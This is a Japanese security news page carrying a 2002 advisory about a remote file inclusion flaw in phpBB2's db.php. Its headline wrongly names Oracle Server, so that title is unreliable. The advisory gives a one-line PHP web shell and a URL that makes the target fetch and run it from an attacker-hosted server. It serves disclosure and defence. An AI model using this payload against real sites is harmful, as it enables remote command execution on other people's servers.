CERT アドバイザリー:Oracle Server に見つかった複数の脆弱性 | ScanNetSecurity
2026.04.15(水)

CERT アドバイザリー:Oracle Server に見つかった複数の脆弱性

[翻訳:関谷 麻美]
2002年3月18日

国際 海外情報
[翻訳:関谷 麻美]
2002年3月18日

◆概要:
 phpbb_root_path 変数は、外部サーバからのスクリプトを受け入れる。結果、攻撃者により作成されたカスタム・スクリプトを使用したリモート実行コマンドに対し phpBB2 を脆弱にする。

◆詳細:
脆弱なシステム:
phpBB2 バージョン 2.0 RC-3 とそれ以前のバージョン
2002年3月18日以前の phpBB2 CVS バージョン

 "phpBB2 root path" 変数は、他の Web サイトからの入力を受け入れる。結果、リモート攻撃者は任意のコマンドをリモートで実行することができる。その脆弱性は、db.php が下記の入力を受け入れるという点にある。
'/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script'
ここで、full_path_to_script は別の Web サーバからの完全な URL である。

 例えば、あなたのWeb サーバに 'db' と呼ばれるディレクトリを作成する。そして、この db ディレクトリに'mysql.txt' か 'mysql4.txt' あるいは 'postgres.txt' と呼ばれるファイルを作成する(他のファイル名は、機能しないと思われる)。

この mysql.txt は、下記の行を含む。

<? echo "<pre>"; system($cmd); ?>

次のステップは、あなたのブラウザに下記の URL を入力することだ。

http://example.com/phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a
あなたは、example.com の 'uname result' を取得できるだろう。

◆追加情報:
 pokley と nullbyte がこの脆弱性を発見した。

[情報提供:SecuriTeam]
http://www.securiteam.com/

《ScanNetSecurity》

PageTop

アクセスランキング

  1. 不正アクセスではなくリニューアル作業中の設定不備が原因 ~ 国税速報データベースからパスワード変更通知メールを誤送信

    不正アクセスではなくリニューアル作業中の設定不備が原因 ~ 国税速報データベースからパスワード変更通知メールを誤送信

  2. 「すでに感染してしまった」最悪のシナリオで訓練実施 ~ LINEヤフーのランサムウェア対応訓練

    「すでに感染してしまった」最悪のシナリオで訓練実施 ~ LINEヤフーのランサムウェア対応訓練

  3. ホームページ内の個人情報非表示の Excel ファイルは検索エンジンの検索結果から閲覧可能

    ホームページ内の個人情報非表示の Excel ファイルは検索エンジンの検索結果から閲覧可能

  4. 佐藤工業の作業所の NAS に不正アクセス、本人情報と緊急連絡先が閲覧された可能性

    佐藤工業の作業所の NAS に不正アクセス、本人情報と緊急連絡先が閲覧された可能性

  5. 林野庁の委託事業で個人情報流出、インドネシア側の送出機関の関係者に提供

    林野庁の委託事業で個人情報流出、インドネシア側の送出機関の関係者に提供

ランキングをもっと見る
PageTop